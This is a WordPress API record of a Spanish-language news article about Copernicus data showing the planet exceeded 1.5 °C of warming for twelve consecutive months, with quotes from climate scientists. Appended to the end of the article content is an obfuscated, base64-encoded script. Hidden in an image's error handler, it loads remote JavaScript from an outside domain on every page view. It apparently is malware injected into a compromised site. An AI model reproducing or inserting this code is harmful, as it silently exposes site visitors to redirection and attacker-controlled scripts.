{"id":7899,"date":"2024-02-13T11:57:00","date_gmt":"2024-02-13T14:57:00","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=7899"},"modified":"2025-08-13T15:47:35","modified_gmt":"2025-08-13T18:47:35","slug":"por-primera-vez-el-planeta-supero-los-15-de-calentamiento-durante-12-meses-seguidos","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=7899","title":{"rendered":"Por primera vez el planeta super\u00f3 los 1,5\u00b0 de calentamiento durante 12 meses seguidos"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-86347858a595f955f86f15ff1c6fab6e\" style=\"background-color:#a17a05e0\"><em>\u00abEs una se\u00f1al muy importante y desastrosa\u00bb, sostuvo Johan Rockstr\u00f6m, del Instituto de Potsdam, organismo alem\u00e1n de investigaci\u00f3n sobre el impacto del clima.<\/em><\/h3>\n\n\n\n<p>El mundo enfrent\u00f3 por primera vez temperaturas 1,5 grados m\u00e1s c\u00e1lidas que en la era preindustrial durante 12 meses seguidos, desde febrero de 2023 a enero de 2024, inform\u00f3 este jueves Copernicus, el Programa de Observaci\u00f3n de la Tierra de la Uni\u00f3n Europea, mientras que los cient\u00edficos aseguraron que este dato representa una&nbsp;<strong>\u00abalerta para la humanidad\u00bb.<\/strong><\/p>\n\n\n\n<p>\u00abEs una se\u00f1al muy importante y desastrosa\u00bb, sostuvo Johan Rockstr\u00f6m, del Instituto de Potsdam, organismo alem\u00e1n de investigaci\u00f3n sobre el impacto del clima.<\/p>\n\n\n\n<p>En ese sentido, agreg\u00f3 que haber alcanzado este grado de calentamiento global es<strong>&nbsp;\u00abuna alerta para decir a la humanidad que nos acercamos m\u00e1s r\u00e1pido de lo previsto al l\u00edmite de 1,5 \u00baC\u00bb.<\/strong><\/p>\n\n\n\n<p>El Servicio Copernicus de Cambio Clim\u00e1tico (C3S) indic\u00f3 hoy que desde febrero de 2023 a enero de 2024 se registr\u00f3 una temperatura media 1,52 \u00baC superior a la del per\u00edodo 1850-1900, algo que los cient\u00edficos llaman una \u00abadvertencia a la humanidad\u00bb.<\/p>\n\n\n\n<p>El mes de enero estuvo marcado por una&nbsp;<strong>ola de calor en Am\u00e9rica del Sur<\/strong>, que sufri\u00f3 temperaturas r\u00e9cord e incendios devastadores en Colombia y Chile, con m\u00e1s de 130 muertos en la regi\u00f3n de Valpara\u00edso.<\/p>\n\n\n\n<p>\u00abEsto no significa que hayamos superado la barrera de +1,5 \u00baC fijada en Par\u00eds\u00bb en 2015, en un acuerdo internacional para intentar contener el calentamiento global y sus consecuencias, dijo Richard Betts, director de estudios sobre los impactos clim\u00e1ticos en la oficina nacional de meteorolog\u00eda brit\u00e1nica.<\/p>\n\n\n\n<p>Para ello, habr\u00eda que superar este l\u00edmite de forma estable durante varias d\u00e9cadas, seg\u00fan consign\u00f3 la agencia de noticias AFP.<\/p>\n\n\n\n<p>\u00abSin embargo, se trata de un nuevo recordatorio de los profundos cambios que ya hemos aportado a nuestro clima mundial y a los que nos tenemos que adaptar ahora\u00bb, agreg\u00f3.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-rich is-provider-twitter wp-block-embed-twitter\"><div class=\"wp-block-embed__wrapper\">\n<blockquote class=\"twitter-tweet\" data-width=\"550\" data-dnt=\"true\"><p lang=\"en\" dir=\"ltr\">Monitoring Sea Surface Temperature (SST) \ud83c\udf21\ufe0f is essential for understanding climate variability and its impact on weather patterns\ud83c\udf00<br> <br>\ud83d\udd3dAnnual SST in the Pacific Ocean, visualised in the <a href=\"https:\/\/twitter.com\/hashtag\/CopernicusMarine?src=hash&amp;ref_src=twsrc%5Etfw\">#CopernicusMarine<\/a> <a href=\"https:\/\/twitter.com\/hashtag\/MyOceanViewer?src=hash&amp;ref_src=twsrc%5Etfw\">#MyOceanViewer<\/a> <a href=\"https:\/\/t.co\/zm91euU6zC\">pic.twitter.com\/zm91euU6zC<\/a><\/p>&mdash; Copernicus EU (@CopernicusEU) <a href=\"https:\/\/twitter.com\/CopernicusEU\/status\/1755540366286041415?ref_src=twsrc%5Etfw\">February 8, 2024<\/a><\/blockquote><script async src=\"https:\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script>\n<\/div><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Un aviso \u00abbrutal\u00bb<\/h2>\n\n\n\n<p>Brian Hoskins, director del Instituto Grantham sobre el cambio clim\u00e1tico del Imperial College de Londres, apunt\u00f3 que los nuevos datos consisten en \u00abun aviso brutal sobre la urgencia de las medidas a tomar para limitar el cambio clim\u00e1tico\u00bb.<\/p>\n\n\n\n<p>Hoy el clima ya se sit\u00faa alrededor de&nbsp;<strong>1,2 \u00baC por encima de la media entre 1850-1900<\/strong>&nbsp;y, al ritmo actual de emisiones, los expertos de la ONU prev\u00e9n que existe una probabilidad del 50% de alcanzar el umbral de 1,5 \u00baC en el lustro de 2030-2035.<\/p>\n\n\n\n<p>Despu\u00e9s de un 2023 de r\u00e9cord, el nuevo a\u00f1o empez\u00f3 con el mes de enero m\u00e1s c\u00e1lido desde el inicio de los registros.<\/p>\n\n\n\n<p>Adem\u00e1s, enero pasado fue el octavo mes consecutivo en el que se marca un r\u00e9cord de calor hist\u00f3rico para cada uno de esos meses, se\u00f1al\u00f3 Copernicus.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.telam.com.ar\/thumbs\/bluesteel\/advf\/imagenes\/2024\/02\/65bbfd4c14d37.24%20foto%20santa%20cruz%20alejandro%203_1200.jpg\" alt=\"\" \/><figcaption class=\"wp-element-caption\"><em><sup>Ola de calor en la Ciudad de Buenos Aires \/ Foto: Alejandro Santa Cruz<\/sup><\/em><\/figcaption><\/figure>\n\n\n\n<p>M\u00e1s all\u00e1 de algunos episodios de fr\u00edo y precipitaciones importantes en algunas partes del mundo, el invierno boreal fue especialmente suave en el sur de Francia, en Espa\u00f1a o en partes de Estados Unidos, Canad\u00e1, \u00c1frica, Medio Oriente y Asia.<\/p>\n\n\n\n<p>\u00abUna reducci\u00f3n r\u00e1pida de las emisiones de gases de efecto invernadero es el \u00fanico medio de frenar el aumento de las temperaturas mundiales\u00bb, apunt\u00f3 Samantha Burgess, jefa adjunta del servicio de cambio clim\u00e1tico de Copernicus.<\/p>\n\n\n\n<p>A mediados de enero, la Organizaci\u00f3n Meteorol\u00f3gica Mundial y la Administraci\u00f3n Nacional Oce\u00e1nica y Atmosf\u00e9rica (NOAA) de Estados Unidos advirtieron que&nbsp;<strong>2024 pod\u00eda \u00abf\u00e1cilmente batir\u00bb el r\u00e9cord de calor del a\u00f1o precedente.<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/www.telam.com.ar\/notas\/202402\/654704-primera-vez-planeta-calentamiento.html\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"1024\" height=\"103\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-1024x103.jpeg\" alt=\"\" class=\"wp-image-7468\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-1024x103.jpeg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-300x30.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-768x77.jpeg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-696x70.jpeg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-320x32.jpeg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-480x48.jpeg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-800x80.jpeg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_.jpeg 1067w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><figcaption class=\"wp-element-caption\">Fuente:<\/figcaption><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>\u00abEs una se\u00f1al muy importante y desastrosa\u00bb, sostuvo Johan Rockstr\u00f6m, del Instituto de Potsdam, organismo alem\u00e1n de investigaci\u00f3n sobre el impacto del clima. El mundo enfrent\u00f3 por primera vez temperaturas 1,5 grados m\u00e1s c\u00e1lidas que en la era preindustrial durante 12 meses seguidos, desde febrero de 2023 a enero de 2024, inform\u00f3 este jueves Copernicus, [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":7900,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[29],"tags":[],"class_list":["post-7899","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-datos-utiles"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7899","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7899"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7899\/revisions"}],"predecessor-version":[{"id":10218,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7899\/revisions\/10218"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/7900"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7899"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7899"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7899"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}